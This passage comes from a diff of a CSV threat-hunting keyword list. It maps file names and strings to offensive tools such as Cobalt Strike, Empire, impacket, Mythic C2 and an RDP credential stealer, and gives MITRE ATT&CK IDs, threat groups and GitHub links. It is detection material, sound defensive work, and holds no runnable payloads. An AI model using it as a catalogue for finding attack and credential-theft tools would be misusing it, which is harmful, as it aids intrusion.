Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/WSPCoerce.git*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*/wwlib/lolbins/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*/www/exploit.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*/x0rz/*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x0rz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/x64_slim.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/x64_slim.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xan7r/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" -"*/xar-1.5.2.tar.gz*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/xar-1.5.2.tar.gz*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xen-mimi.ps1*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/xml_attack.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" @@ -5861,14 +5930,15 @@ "*/xPipe/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*/xss_robertux.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" "*/xxe_fuzz.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/yanghaoi/_CNA*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*/ysoserial/*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/yanghaoi/_CNA*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/ysoserial/*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zerologon.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" -"*/zerologon.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/zerologon.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/zhzyker/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/zhzyker/CVE-2020-5902/","1","0","N/A","N/A","1","13","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z" "*/zsh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/zwjjustdoit/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","1","0","3","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z" @@ -5879,56 +5949,57 @@ "*:\Users\Public\Music\*.dll*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*:'123pentest'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*:8999/Payloads/*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" -"*:9090*/api/v1.0/relays*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*?convert_ccache_to_kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*?convert_kirbi_to_ccache*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*:9090*/api/v1.0/relays*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?convert_ccache_to_kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?convert_kirbi_to_ccache*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*?PSAmsi*PSReflect.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*?sample_sliver.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*[!] Failed to enumerate Credman:*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" -"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - 